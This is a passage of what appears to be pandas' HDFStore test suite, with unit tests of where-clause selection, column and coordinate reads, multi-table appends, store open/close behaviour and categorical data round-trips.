tm.assert_frame_equal(result, expected)
result = store.select('frame', [crit3])
expected = df.loc[:, ['A']]
tm.assert_frame_equal(result, expected)
# invalid terms
df = tm.makeTimeDataFrame()
store.append('df_time', df)
pytest.raises(
ValueError, store.select, 'df_time', "index>0")
# can't select if not written as table
# store['frame'] = df
# pytest.raises(ValueError, store.select,
# 'frame', [crit1, crit2])
def test_frame_select_complex(self):
# select via complex criteria
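        # Combines &, | and != conditions on a string data column; note
        # below that numexpr cannot invert a whole condition
        # (~(string="bar") raises NotImplementedError), although ~ works
        # for column filters.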
df = tm.makeTimeDataFrame()
df['string'] = 'foo'
df.loc[df.index[0:4], 'string'] = 'bar'
with ensure_clean_store(self.path) as store:
store.put('df', df, format='table', data_columns=['string'])
# empty
result = store.select('df', 'index>df.index[3] & string="bar"')
expected = df.loc[(df.index > df.index[3]) & (df.string == 'bar')]
tm.assert_frame_equal(result, expected)
result = store.select('df', 'index>df.index[3] & string="foo"')
expected = df.loc[(df.index > df.index[3]) & (df.string == 'foo')]
tm.assert_frame_equal(result, expected)
# or
result = store.select('df', 'index>df.index[3] | string="bar"')
expected = df.loc[(df.index > df.index[3]) | (df.string == 'bar')]
tm.assert_frame_equal(result, expected)
result = store.select('df', '(index>df.index[3] & '
'index<=df.index[6]) | string="bar"')
expected = df.loc[((df.index > df.index[3]) & (
df.index <= df.index[6])) | (df.string == 'bar')]
tm.assert_frame_equal(result, expected)
# invert
result = store.select('df', 'string!="bar"')
expected = df.loc[df.string != 'bar']
tm.assert_frame_equal(result, expected)
# invert not implemented in numexpr :(
pytest.raises(NotImplementedError,
store.select, 'df', '~(string="bar")')
# invert ok for filters
result = store.select('df', "~(columns=['A','B'])")
expected = df.loc[:, df.columns.difference(['A', 'B'])]
tm.assert_frame_equal(result, expected)
# in
result = store.select(
'df', "index>df.index[3] & columns in ['A','B']")
expected = df.loc[df.index > df.index[3]].reindex(columns=[
'A', 'B'])
tm.assert_frame_equal(result, expected)
def test_frame_select_complex2(self):
with ensure_clean_path(['parms.hdf', 'hist.hdf']) as paths:
pp, hh = paths
# use non-trivial selection criteria
parms = DataFrame({'A': [1, 1, 2, 2, 3]})
parms.to_hdf(pp, 'df', mode='w',
format='table', data_columns=['A'])
selection = read_hdf(pp, 'df', where='A=[2,3]')
hist = DataFrame(np.random.randn(25, 1),
columns=['data'],
index=MultiIndex.from_tuples(
[(i, j) for i in range(5)
for j in range(5)],
names=['l1', 'l2']))
hist.to_hdf(hh, 'df', mode='w', format='table')
expected = read_hdf(hh, 'df', where='l1=[2, 3, 4]')
            # scope with list-like
l = selection.index.tolist() # noqa
store = HDFStore(hh)
result = store.select('df', where='l1=l')
assert_frame_equal(result, expected)
store.close()
result = read_hdf(hh, 'df', where='l1=l')
assert_frame_equal(result, expected)
# index
index = selection.index # noqa
result = read_hdf(hh, 'df', where='l1=index')
assert_frame_equal(result, expected)
result = read_hdf(hh, 'df', where='l1=selection.index')
assert_frame_equal(result, expected)
result = read_hdf(hh, 'df', where='l1=selection.index.tolist()')
assert_frame_equal(result, expected)
result = read_hdf(hh, 'df', where='l1=list(selection.index)')
assert_frame_equal(result, expected)
            # scope with index
store = HDFStore(hh)
result = store.select('df', where='l1=index')
assert_frame_equal(result, expected)
result = store.select('df', where='l1=selection.index')
assert_frame_equal(result, expected)
result = store.select('df', where='l1=selection.index.tolist()')
assert_frame_equal(result, expected)
result = store.select('df', where='l1=list(selection.index)')
assert_frame_equal(result, expected)
store.close()
def test_invalid_filtering(self):
# can't use more than one filter (atm)
df = tm.makeTimeDataFrame()
with ensure_clean_store(self.path) as store:
store.put('df', df, format='table')
# not implemented
pytest.raises(NotImplementedError, store.select,
'df', "columns=['A'] | columns=['B']")
# in theory we could deal with this
pytest.raises(NotImplementedError, store.select,
'df', "columns=['A','B'] & columns=['C']")
def test_string_select(self):
# GH 2973
with ensure_clean_store(self.path) as store:
df = tm.makeTimeDataFrame()
# test string ==/!=
df['x'] = 'none'
df.loc[2:7, 'x'] = ''
store.append('df', df, data_columns=['x'])
result = store.select('df', 'x=none')
expected = df[df.x == 'none']
assert_frame_equal(result, expected)
try:
result = store.select('df', 'x!=none')
expected = df[df.x != 'none']
assert_frame_equal(result, expected)
except Exception as detail:
pprint_thing("[{0}]".format(detail))
pprint_thing(store)
pprint_thing(expected)
df2 = df.copy()
df2.loc[df2.x == '', 'x'] = np.nan
store.append('df2', df2, data_columns=['x'])
result = store.select('df2', 'x!=none')
expected = df2[isna(df2.x)]
assert_frame_equal(result, expected)
# int ==/!=
df['int'] = 1
df.loc[2:7, 'int'] = 2
store.append('df3', df, data_columns=['int'])
result = store.select('df3', 'int=2')
expected = df[df.int == 2]
assert_frame_equal(result, expected)
result = store.select('df3', 'int!=2')
expected = df[df.int != 2]
assert_frame_equal(result, expected)
def test_read_column(self):
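        # select_column returns a single stored column as a Series; it only
        # works for the index or for data_columns (values_block_* raises
        # ValueError), passing a where clause raises, and start/stop
        # slicing is supported.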
df = tm.makeTimeDataFrame()
with ensure_clean_store(self.path) as store:
_maybe_remove(store, 'df')
store.append('df', df)
# error
pytest.raises(KeyError, store.select_column, 'df', 'foo')
def f():
store.select_column('df', 'index', where=['index>5'])
pytest.raises(Exception, f)
# valid
result = store.select_column('df', 'index')
tm.assert_almost_equal(result.values, Series(df.index).values)
assert isinstance(result, Series)
# not a data indexable column
pytest.raises(
ValueError, store.select_column, 'df', 'values_block_0')
# a data column
df2 = df.copy()
df2['string'] = 'foo'
store.append('df2', df2, data_columns=['string'])
result = store.select_column('df2', 'string')
tm.assert_almost_equal(result.values, df2['string'].values)
# a data column with NaNs, result excludes the NaNs
df3 = df.copy()
df3['string'] = 'foo'
df3.loc[4:6, 'string'] = np.nan
store.append('df3', df3, data_columns=['string'])
result = store.select_column('df3', 'string')
tm.assert_almost_equal(result.values, df3['string'].values)
# start/stop
result = store.select_column('df3', 'string', start=2)
tm.assert_almost_equal(result.values, df3['string'].values[2:])
result = store.select_column('df3', 'string', start=-2)
tm.assert_almost_equal(result.values, df3['string'].values[-2:])
result = store.select_column('df3', 'string', stop=2)
tm.assert_almost_equal(result.values, df3['string'].values[:2])
result = store.select_column('df3', 'string', stop=-2)
tm.assert_almost_equal(result.values, df3['string'].values[:-2])
result = store.select_column('df3', 'string', start=2, stop=-2)
tm.assert_almost_equal(result.values, df3['string'].values[2:-2])
result = store.select_column('df3', 'string', start=-2, stop=2)
tm.assert_almost_equal(result.values, df3['string'].values[-2:2])
# GH 10392 - make sure column name is preserved
df4 = DataFrame({'A': np.random.randn(10), 'B': 'foo'})
store.append('df4', df4, data_columns=True)
expected = df4['B']
result = store.select_column('df4', 'B')
tm.assert_series_equal(result, expected)
def test_coordinates(self):
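        # select_as_coordinates returns an Index of row numbers matching a
        # where clause; that Index (or an integer/boolean sequence) can be
        # passed back as `where` to select the same rows, including from a
        # second table with aligned rows.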
df = tm.makeTimeDataFrame()
with ensure_clean_store(self.path) as store:
_maybe_remove(store, 'df')
store.append('df', df)
# all
c = store.select_as_coordinates('df')
assert((c.values == np.arange(len(df.index))).all())
# get coordinates back & test vs frame
_maybe_remove(store, 'df')
df = DataFrame(dict(A=lrange(5), B=lrange(5)))
store.append('df', df)
c = store.select_as_coordinates('df', ['index<3'])
assert((c.values == np.arange(3)).all())
result = store.select('df', where=c)
expected = df.loc[0:2, :]
tm.assert_frame_equal(result, expected)
c = store.select_as_coordinates('df', ['index>=3', 'index<=4'])
assert((c.values == np.arange(2) + 3).all())
result = store.select('df', where=c)
expected = df.loc[3:4, :]
tm.assert_frame_equal(result, expected)
assert isinstance(c, Index)
# multiple tables
_maybe_remove(store, 'df1')
_maybe_remove(store, 'df2')
df1 = tm.makeTimeDataFrame()
df2 = tm.makeTimeDataFrame().rename(columns=lambda x: "%s_2" % x)
store.append('df1', df1, data_columns=['A', 'B'])
store.append('df2', df2)
c = store.select_as_coordinates('df1', ['A>0', 'B>0'])
df1_result = store.select('df1', c)
df2_result = store.select('df2', c)
result = concat([df1_result, df2_result], axis=1)
expected = concat([df1, df2], axis=1)
expected = expected[(expected.A > 0) & (expected.B > 0)]
tm.assert_frame_equal(result, expected)
# pass array/mask as the coordinates
with ensure_clean_store(self.path) as store:
df = DataFrame(np.random.randn(1000, 2),
index=date_range('20000101', periods=1000))
store.append('df', df)
c = store.select_column('df', 'index')
where = c[DatetimeIndex(c).month == 5].index
expected = df.iloc[where]
# locations
result = store.select('df', where=where)
tm.assert_frame_equal(result, expected)
# boolean
result = store.select('df', where=where)
tm.assert_frame_equal(result, expected)
# invalid
pytest.raises(ValueError, store.select, 'df',
where=np.arange(len(df), dtype='float64'))
pytest.raises(ValueError, store.select, 'df',
where=np.arange(len(df) + 1))
pytest.raises(ValueError, store.select, 'df',
where=np.arange(len(df)), start=5)
pytest.raises(ValueError, store.select, 'df',
where=np.arange(len(df)), start=5, stop=10)
# selection with filter
selection = date_range('20000101', periods=500)
result = store.select('df', where='index in selection')
expected = df[df.index.isin(selection)]
tm.assert_frame_equal(result, expected)
# list
df = DataFrame(np.random.randn(10, 2))
store.append('df2', df)
result = store.select('df2', where=[0, 3, 5])
expected = df.iloc[[0, 3, 5]]
tm.assert_frame_equal(result, expected)
# boolean
where = [True] * 10
where[-2] = False
result = store.select('df2', where=where)
expected = df.loc[where]
tm.assert_frame_equal(result, expected)
# start/stop
result = store.select('df2', start=5, stop=10)
expected = df[5:10]
tm.assert_frame_equal(result, expected)
def test_append_to_multiple(self):
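        # append_to_multiple splits one wide frame across several tables
        # (the dict maps table name -> columns, with None meaning "the
        # remaining columns"); the `selector` table is the one whose columns
        # are used for where-based selection, and select_as_multiple rejoins
        # the pieces on their shared rows.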
df1 = tm.makeTimeDataFrame()
df2 = tm.makeTimeDataFrame().rename(columns=lambda x: "%s_2" % x)
df2['foo'] = 'bar'
df = concat([df1, df2], axis=1)
with ensure_clean_store(self.path) as store:
# exceptions
pytest.raises(ValueError, store.append_to_multiple,
{'df1': ['A', 'B'], 'df2': None}, df,
selector='df3')
pytest.raises(ValueError, store.append_to_multiple,
{'df1': None, 'df2': None}, df, selector='df3')
pytest.raises(
ValueError, store.append_to_multiple, 'df1', df, 'df1')
# regular operation
store.append_to_multiple(
{'df1': ['A', 'B'], 'df2': None}, df, selector='df1')
result = store.select_as_multiple(
['df1', 'df2'], where=['A>0', 'B>0'], selector='df1')
expected = df[(df.A > 0) & (df.B > 0)]
tm.assert_frame_equal(result, expected)
def test_append_to_multiple_dropna(self):
df1 = tm.makeTimeDataFrame()
df2 = tm.makeTimeDataFrame().rename(columns=lambda x: "%s_2" % x)
df1.iloc[1, df1.columns.get_indexer(['A', 'B'])] = np.nan
df = concat([df1, df2], axis=1)
with ensure_clean_store(self.path) as store:
# dropna=True should guarantee rows are synchronized
store.append_to_multiple(
{'df1': ['A', 'B'], 'df2': None}, df, selector='df1',
dropna=True)
result = store.select_as_multiple(['df1', 'df2'])
expected = df.dropna()
tm.assert_frame_equal(result, expected)
tm.assert_index_equal(store.select('df1').index,
store.select('df2').index)
@pytest.mark.xfail(run=False,
reason="append_to_multiple_dropna_false "
"is not raising as failed")
def test_append_to_multiple_dropna_false(self):
df1 = tm.makeTimeDataFrame()
df2 = tm.makeTimeDataFrame().rename(columns=lambda x: "%s_2" % x)
df1.iloc[1, df1.columns.get_indexer(['A', 'B'])] = np.nan
df = concat([df1, df2], axis=1)
with ensure_clean_store(self.path) as store:
# dropna=False shouldn't synchronize row indexes
store.append_to_multiple(
{'df1a': ['A', 'B'], 'df2a': None}, df, selector='df1a',
dropna=False)
with pytest.raises(ValueError):
store.select_as_multiple(['df1a', 'df2a'])
assert not store.select('df1a').index.equals(
store.select('df2a').index)
def test_select_as_multiple(self):
df1 = tm.makeTimeDataFrame()
df2 = tm.makeTimeDataFrame().rename(columns=lambda x: "%s_2" % x)
df2['foo'] = 'bar'
with ensure_clean_store(self.path) as store:
# no tables stored
pytest.raises(Exception, store.select_as_multiple,
None, where=['A>0', 'B>0'], selector='df1')
store.append('df1', df1, data_columns=['A', 'B'])
store.append('df2', df2)
# exceptions
pytest.raises(Exception, store.select_as_multiple,
None, where=['A>0', 'B>0'], selector='df1')
pytest.raises(Exception, store.select_as_multiple,
[None], where=['A>0', 'B>0'], selector='df1')
pytest.raises(KeyError, store.select_as_multiple,
['df1', 'df3'], where=['A>0', 'B>0'],
selector='df1')
pytest.raises(KeyError, store.select_as_multiple,
['df3'], where=['A>0', 'B>0'], selector='df1')
pytest.raises(KeyError, store.select_as_multiple,
['df1', 'df2'], where=['A>0', 'B>0'],
selector='df4')
# default select
result = store.select('df1', ['A>0', 'B>0'])
expected = store.select_as_multiple(
['df1'], where=['A>0', 'B>0'], selector='df1')
tm.assert_frame_equal(result, expected)
expected = store.select_as_multiple(
'df1', where=['A>0', 'B>0'], selector='df1')
tm.assert_frame_equal(result, expected)
# multiple
result = store.select_as_multiple(
['df1', 'df2'], where=['A>0', 'B>0'], selector='df1')
expected = concat([df1, df2], axis=1)
expected = expected[(expected.A > 0) & (expected.B > 0)]
tm.assert_frame_equal(result, expected)
# multiple (diff selector)
result = store.select_as_multiple(
['df1', 'df2'], where='index>df2.index[4]', selector='df2')
expected = concat([df1, df2], axis=1)
expected = expected[5:]
tm.assert_frame_equal(result, expected)
            # test exception for differing row counts
store.append('df3', tm.makeTimeDataFrame(nper=50))
pytest.raises(ValueError, store.select_as_multiple,
['df1', 'df3'], where=['A>0', 'B>0'],
selector='df1')
@pytest.mark.skipif(
LooseVersion(tables.__version__) < LooseVersion('3.1.0'),
reason=("tables version does not support fix for nan selection "
"bug: GH 4858"))
def test_nan_selection_bug_4858(self):
with ensure_clean_store(self.path) as store:
df = DataFrame(dict(cols=range(6), values=range(6)),
dtype='float64')
df['cols'] = (df['cols'] + 10).apply(str)
df.iloc[0] = np.nan
expected = DataFrame(dict(cols=['13.0', '14.0', '15.0'], values=[
3., 4., 5.]), index=[3, 4, 5])
# write w/o the index on that particular column
store.append('df', df, data_columns=True, index=['cols'])
result = store.select('df', where='values>2.0')
assert_frame_equal(result, expected)
def test_start_stop_table(self):
with ensure_clean_store(self.path) as store:
# table
df = DataFrame(dict(A=np.random.rand(20), B=np.random.rand(20)))
store.append('df', df)
result = store.select(
'df', "columns=['A']", start=0, stop=5)
expected = df.loc[0:4, ['A']]
tm.assert_frame_equal(result, expected)
# out of range
result = store.select(
'df', "columns=['A']", start=30, stop=40)
assert len(result) == 0
expected = df.loc[30:40, ['A']]
tm.assert_frame_equal(result, expected)
def test_start_stop_multiple(self):
# GH 16209
with ensure_clean_store(self.path) as store:
df = DataFrame({"foo": [1, 2], "bar": [1, 2]})
store.append_to_multiple({'selector': ['foo'], 'data': None}, df,
selector='selector')
result = store.select_as_multiple(['selector', 'data'],
selector='selector', start=0,
stop=1)
expected = df.loc[[0], ['foo', 'bar']]
tm.assert_frame_equal(result, expected)
def test_start_stop_fixed(self):
with ensure_clean_store(self.path) as store:
# fixed, GH 8287
df = DataFrame(dict(A=np.random.rand(20),
B=np.random.rand(20)),
index=pd.date_range('20130101', periods=20))
store.put('df', df)
result = store.select(
'df', start=0, stop=5)
expected = df.iloc[0:5, :]
tm.assert_frame_equal(result, expected)
result = store.select(
'df', start=5, stop=10)
expected = df.iloc[5:10, :]
tm.assert_frame_equal(result, expected)
# out of range
result = store.select(
'df', start=30, stop=40)
expected = df.iloc[30:40, :]
tm.assert_frame_equal(result, expected)
# series
s = df.A
store.put('s', s)
result = store.select('s', start=0, stop=5)
expected = s.iloc[0:5]
tm.assert_series_equal(result, expected)
result = store.select('s', start=5, stop=10)
expected = s.iloc[5:10]
tm.assert_series_equal(result, expected)
# sparse; not implemented
df = tm.makeDataFrame()
df.iloc[3:5, 1:3] = np.nan
df.iloc[8:10, -2] = np.nan
dfs = df.to_sparse()
store.put('dfs', dfs)
with pytest.raises(NotImplementedError):
store.select('dfs', start=0, stop=5)
def test_select_filter_corner(self):
df = DataFrame(np.random.randn(50, 100))
df.index = ['%.3d' % c for c in df.index]
df.columns = ['%.3d' % c for c in df.columns]
with ensure_clean_store(self.path) as store:
store.put('frame', df, format='table')
crit = 'columns=df.columns[:75]'
result = store.select('frame', [crit])
tm.assert_frame_equal(result, df.loc[:, df.columns[:75]])
crit = 'columns=df.columns[:75:2]'
result = store.select('frame', [crit])
tm.assert_frame_equal(result, df.loc[:, df.columns[:75:2]])
def test_path_pathlib(self):
df = tm.makeDataFrame()
result = tm.round_trip_pathlib(
lambda p: df.to_hdf(p, 'df'),
lambda p: pd.read_hdf(p, 'df'))
tm.assert_frame_equal(df, result)
@pytest.mark.parametrize('start, stop', [(0, 2), (1, 2), (None, None)])
def test_contiguous_mixed_data_table(self, start, stop):
# GH 17021
# ValueError when reading a contiguous mixed-data table ft. VLArray
df = DataFrame({'a': Series([20111010, 20111011, 20111012]),
'b': Series(['ab', 'cd', 'ab'])})
with ensure_clean_store(self.path) as store:
store.append('test_dataset', df)
result = store.select('test_dataset', start=start, stop=stop)
assert_frame_equal(df[start:stop], result)
def test_path_pathlib_hdfstore(self):
df = tm.makeDataFrame()
def writer(path):
with pd.HDFStore(path) as store:
df.to_hdf(store, 'df')
def reader(path):
with pd.HDFStore(path) as store:
return pd.read_hdf(store, 'df')
result = tm.round_trip_pathlib(writer, reader)
tm.assert_frame_equal(df, result)
def test_pickle_path_localpath(self):
df = tm.makeDataFrame()
        result = tm.round_trip_localpath(
lambda p: df.to_hdf(p, 'df'),
lambda p: pd.read_hdf(p, 'df'))
tm.assert_frame_equal(df, result)
def test_path_localpath_hdfstore(self):
df = tm.makeDataFrame()
def writer(path):
with pd.HDFStore(path) as store:
df.to_hdf(store, 'df')
def reader(path):
with pd.HDFStore(path) as store:
return pd.read_hdf(store, 'df')
result = tm.round_trip_localpath(writer, reader)
tm.assert_frame_equal(df, result)
def _check_roundtrip(self, obj, comparator, compression=False, **kwargs):
options = {}
if compression:
options['complib'] = _default_compressor
with ensure_clean_store(self.path, 'w', **options) as store:
store['obj'] = obj
retrieved = store['obj']
comparator(retrieved, obj, **kwargs)
def _check_double_roundtrip(self, obj, comparator, compression=False,
**kwargs):
options = {}
if compression:
options['complib'] = compression or _default_compressor
with ensure_clean_store(self.path, 'w', **options) as store:
store['obj'] = obj
retrieved = store['obj']
comparator(retrieved, obj, **kwargs)
store['obj'] = retrieved
again = store['obj']
comparator(again, obj, **kwargs)
def _check_roundtrip_table(self, obj, comparator, compression=False):
options = {}
if compression:
options['complib'] = _default_compressor
with ensure_clean_store(self.path, 'w', **options) as store:
store.put('obj', obj, format='table')
retrieved = store['obj']
comparator(retrieved, obj)
def test_multiple_open_close(self):
# gh-4409: open & close multiple times
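        # Covers open/close semantics: info() reports CLOSED and is_open
        # flips to False after close(); whether two handles on the same file
        # may be open at once depends on PyTables' file-open policy; most
        # operations on a closed store raise ClosedFileError (attribute
        # access raises AttributeError).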
with ensure_clean_path(self.path) as path:
df = tm.makeDataFrame()
df.to_hdf(path, 'df', mode='w', format='table')
# single
store = HDFStore(path)
assert 'CLOSED' not in store.info()
assert store.is_open
store.close()
assert 'CLOSED' in store.info()
assert not store.is_open
with ensure_clean_path(self.path) as path:
if pytables._table_file_open_policy_is_strict:
# multiples
store1 = HDFStore(path)
def f():
HDFStore(path)
pytest.raises(ValueError, f)
store1.close()
else:
# multiples
store1 = HDFStore(path)
store2 = HDFStore(path)
assert 'CLOSED' not in store1.info()
assert 'CLOSED' not in store2.info()
assert store1.is_open
assert store2.is_open
store1.close()
assert 'CLOSED' in store1.info()
assert not store1.is_open
assert 'CLOSED' not in store2.info()
assert store2.is_open
store2.close()
assert 'CLOSED' in store1.info()
assert 'CLOSED' in store2.info()
assert not store1.is_open
assert not store2.is_open
# nested close
store = HDFStore(path, mode='w')
store.append('df', df)
store2 = HDFStore(path)
store2.append('df2', df)
store2.close()
assert 'CLOSED' in store2.info()
assert not store2.is_open
store.close()
assert 'CLOSED' in store.info()
assert not store.is_open
# double closing
store = HDFStore(path, mode='w')
store.append('df', df)
store2 = HDFStore(path)
store.close()
assert 'CLOSED' in store.info()
assert not store.is_open
store2.close()
assert 'CLOSED' in store2.info()
assert not store2.is_open
# ops on a closed store
with ensure_clean_path(self.path) as path:
df = tm.makeDataFrame()
df.to_hdf(path, 'df', mode='w', format='table')
store = HDFStore(path)
store.close()
pytest.raises(ClosedFileError, store.keys)
pytest.raises(ClosedFileError, lambda: 'df' in store)
pytest.raises(ClosedFileError, lambda: len(store))
pytest.raises(ClosedFileError, lambda: store['df'])
pytest.raises(AttributeError, lambda: store.df)
pytest.raises(ClosedFileError, store.select, 'df')
pytest.raises(ClosedFileError, store.get, 'df')
pytest.raises(ClosedFileError, store.append, 'df2', df)
pytest.raises(ClosedFileError, store.put, 'df3', df)
pytest.raises(ClosedFileError, store.get_storer, 'df2')
pytest.raises(ClosedFileError, store.remove, 'df2')
def f():
store.select('df')
tm.assert_raises_regex(ClosedFileError, 'file is not open', f)
def test_pytables_native_read(self):
with ensure_clean_store(
tm.get_data_path('legacy_hdf/pytables_native.h5'),
mode='r') as store:
d2 = store['detector/readout']
assert isinstance(d2, DataFrame)
@pytest.mark.skipif(PY35 and is_platform_windows(),
reason="native2 read fails oddly on windows / 3.5")
def test_pytables_native2_read(self):
with ensure_clean_store(
tm.get_data_path('legacy_hdf/pytables_native2.h5'),
mode='r') as store:
str(store)
d1 = store['detector']
assert isinstance(d1, DataFrame)
def test_legacy_table_read(self):
# legacy table types
with ensure_clean_store(
tm.get_data_path('legacy_hdf/legacy_table.h5'),
mode='r') as store:
with catch_warnings(record=True):
store.select('df1')
store.select('df2')
store.select('wp1')
# force the frame
store.select('df2', typ='legacy_frame')
# old version warning
pytest.raises(
Exception, store.select, 'wp1', 'minor_axis=B')
df2 = store.select('df2')
result = store.select('df2', 'index>df2.index[2]')
expected = df2[df2.index > df2.index[2]]
assert_frame_equal(expected, result)
def test_copy(self):
with catch_warnings(record=True):
def do_copy(f, new_f=None, keys=None,
propindexes=True, **kwargs):
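                # Copy the store to a new file (a temp file when new_f is
                # None) and verify the copied keys, row counts and, when
                # propindexes is True, that indexed axes stay indexed.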
try:
store = HDFStore(f, 'r')
if new_f is None:
import tempfile
fd, new_f = tempfile.mkstemp()
tstore = store.copy(
new_f, keys=keys, propindexes=propindexes, **kwargs)
# check keys
if keys is None:
keys = store.keys()
assert set(keys) == set(tstore.keys())
                    # check indices & nrows
for k in tstore.keys():
if tstore.get_storer(k).is_table:
new_t = tstore.get_storer(k)
orig_t = store.get_storer(k)
assert orig_t.nrows == new_t.nrows
                            # check propindexes
if propindexes:
for a in orig_t.axes:
if a.is_indexed:
assert new_t[a.name].is_indexed
finally:
safe_close(store)
safe_close(tstore)
try:
os.close(fd)
                    except Exception:
pass
safe_remove(new_f)
# new table
df = tm.makeDataFrame()
try:
path = create_tempfile(self.path)
st = HDFStore(path)
st.append('df', df, data_columns=['A'])
st.close()
do_copy(f=path)
do_copy(f=path, propindexes=False)
finally:
safe_remove(path)
def test_store_datetime_fractional_secs(self):
with ensure_clean_store(self.path) as store:
dt = datetime.datetime(2012, 1, 2, 3, 4, 5, 123456)
series = Series([0], [dt])
store['a'] = series
assert store['a'].index[0] == dt
def test_tseries_indices_series(self):
with ensure_clean_store(self.path) as store:
idx = tm.makeDateIndex(10)
ser = Series(np.random.randn(len(idx)), idx)
store['a'] = ser
result = store['a']
tm.assert_series_equal(result, ser)
assert result.index.freq == ser.index.freq
tm.assert_class_equal(result.index, ser.index, obj="series index")
idx = tm.makePeriodIndex(10)
ser = Series(np.random.randn(len(idx)), idx)
store['a'] = ser
result = store['a']
tm.assert_series_equal(result, ser)
assert result.index.freq == ser.index.freq
tm.assert_class_equal(result.index, ser.index, obj="series index")
def test_tseries_indices_frame(self):
with ensure_clean_store(self.path) as store:
idx = tm.makeDateIndex(10)
df = DataFrame(np.random.randn(len(idx), 3), index=idx)
store['a'] = df
result = store['a']
assert_frame_equal(result, df)
assert result.index.freq == df.index.freq
tm.assert_class_equal(result.index, df.index,
obj="dataframe index")
idx = tm.makePeriodIndex(10)
df = DataFrame(np.random.randn(len(idx), 3), idx)
store['a'] = df
result = store['a']
assert_frame_equal(result, df)
assert result.index.freq == df.index.freq
tm.assert_class_equal(result.index, df.index,
obj="dataframe index")
def test_unicode_index(self):
unicode_values = [u('\u03c3'), u('\u03c3\u03c3')]
# PerformanceWarning
with catch_warnings(record=True):
s = Series(np.random.randn(len(unicode_values)), unicode_values)
self._check_roundtrip(s, tm.assert_series_equal)
def test_unicode_longer_encoded(self):
# GH 11234
char = '\u0394'
df = pd.DataFrame({'A': [char]})
with ensure_clean_store(self.path) as store:
store.put('df', df, format='table', encoding='utf-8')
result = store.get('df')
tm.assert_frame_equal(result, df)
df = pd.DataFrame({'A': ['a', char], 'B': ['b', 'b']})
with ensure_clean_store(self.path) as store:
store.put('df', df, format='table', encoding='utf-8')
result = store.get('df')
tm.assert_frame_equal(result, df)
def test_store_datetime_mixed(self):
df = DataFrame(
{'a': [1, 2, 3], 'b': [1., 2., 3.], 'c': ['a', 'b', 'c']})
ts = tm.makeTimeSeries()
df['d'] = ts.index[:3]
self._check_roundtrip(df, tm.assert_frame_equal)
# def test_cant_write_multiindex_table(self):
# # for now, #1848
# df = DataFrame(np.random.randn(10, 4),
# index=[np.arange(5).repeat(2),
# np.tile(np.arange(2), 5)])
# pytest.raises(Exception, store.put, 'foo', df, format='table')
def test_append_with_diff_col_name_types_raises_value_error(self):
df = DataFrame(np.random.randn(10, 1))
df2 = DataFrame({'a': np.random.randn(10)})
df3 = DataFrame({(1, 2): np.random.randn(10)})
df4 = DataFrame({('1', 2): np.random.randn(10)})
df5 = DataFrame({('1', 2, object): np.random.randn(10)})
with ensure_clean_store(self.path) as store:
name = 'df_%s' % tm.rands(10)
store.append(name, df)
for d in (df2, df3, df4, df5):
with pytest.raises(ValueError):
store.append(name, d)
def test_query_with_nested_special_character(self):
df = DataFrame({'a': ['a', 'a', 'c', 'b',
'test & test', 'c', 'b', 'e'],
'b': [1, 2, 3, 4, 5, 6, 7, 8]})
expected = df[df.a == 'test & test']
with ensure_clean_store(self.path) as store:
store.append('test', df, format='table', data_columns=True)
result = store.select('test', 'a = "test & test"')
tm.assert_frame_equal(expected, result)
def test_categorical(self):
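        # Categorical Series/DataFrames round-trip through table format; the
        # category metadata is stored under a /meta node, appends must use
        # the same categories, and removing the table also removes its
        # metadata.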
with ensure_clean_store(self.path) as store:
# Basic
_maybe_remove(store, 's')
s = Series(Categorical(['a', 'b', 'b', 'a', 'a', 'c'], categories=[
'a', 'b', 'c', 'd'], ordered=False))
store.append('s', s, format='table')
result = store.select('s')
tm.assert_series_equal(s, result)
_maybe_remove(store, 's_ordered')
s = Series(Categorical(['a', 'b', 'b', 'a', 'a', 'c'], categories=[
'a', 'b', 'c', 'd'], ordered=True))
store.append('s_ordered', s, format='table')
result = store.select('s_ordered')
tm.assert_series_equal(s, result)
_maybe_remove(store, 'df')
df = DataFrame({"s": s, "vals": [1, 2, 3, 4, 5, 6]})
store.append('df', df, format='table')
result = store.select('df')
tm.assert_frame_equal(result, df)
# Dtypes
s = Series([1, 1, 2, 2, 3, 4, 5]).astype('category')
store.append('si', s)
result = store.select('si')
tm.assert_series_equal(result, s)
s = Series([1, 1, np.nan, 2, 3, 4, 5]).astype('category')
store.append('si2', s)
result = store.select('si2')
tm.assert_series_equal(result, s)
# Multiple
df2 = df.copy()
df2['s2'] = Series(list('abcdefg')).astype('category')
store.append('df2', df2)
result = store.select('df2')
tm.assert_frame_equal(result, df2)
# Make sure the metadata is OK
info = store.info()
assert '/df2 ' in info
# assert '/df2/meta/values_block_0/meta' in info
assert '/df2/meta/values_block_1/meta' in info
# unordered
s = Series(Categorical(['a', 'b', 'b', 'a', 'a', 'c'], categories=[
'a', 'b', 'c', 'd'], ordered=False))
store.append('s2', s, format='table')
result = store.select('s2')
tm.assert_series_equal(result, s)
# Query
store.append('df3', df, data_columns=['s'])
expected = df[df.s.isin(['b', 'c'])]
result = store.select('df3', where=['s in ["b","c"]'])
tm.assert_frame_equal(result, expected)
expected = df[df.s.isin(['b', 'c'])]
result = store.select('df3', where=['s = ["b","c"]'])
tm.assert_frame_equal(result, expected)
expected = df[df.s.isin(['d'])]
result = store.select('df3', where=['s in ["d"]'])
tm.assert_frame_equal(result, expected)
expected = df[df.s.isin(['f'])]
result = store.select('df3', where=['s in ["f"]'])
tm.assert_frame_equal(result, expected)
# Appending with same categories is ok
store.append('df3', df)
df = concat([df, df])
expected = df[df.s.isin(['b', 'c'])]
result = store.select('df3', where=['s in ["b","c"]'])
tm.assert_frame_equal(result, expected)
# Appending must have the same categories
df3 = df.copy()
df3['s'].cat.remove_unused_categories(inplace=True)
with pytest.raises(ValueError):
store.append('df3', df3)
# Remove, and make sure meta data is removed (its a recursive
# removal so should be).
result = store.select('df3/meta/s/meta')
assert result is not None
store.remove('df3')
with pytest.raises(KeyError):
store.select('df3/meta/s/meta')
def test_categorical_conversion(self):
# GH13322
        # Check that read_hdf with categorical columns doesn't return rows
        # when the where criteria aren't met.
obsids = ['ESP_012345_6789', 'ESP_987654_3210']
imgids = ['APF00006np', 'APF0001imm']
data = [4.3, 9.8]
# Test without categories
df = DataFrame(dict(obsids=obsids, imgids=imgids, data=data))
# We are expecting an empty DataFrame matching types of df
expected = df.iloc[[], :]
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format='table', data_columns=True)
result = read_hdf(path, 'df', where='obsids=B')
tm.assert_frame_equal(result, expected)
# Test with categories
df.obsids = df.obsids.astype('category')
df.imgids = df.imgids.astype('category')
# We are expecting an empty DataFrame matching types of df
expected = df.iloc[[], :]
with ensure_clean_path(self.path) as path:
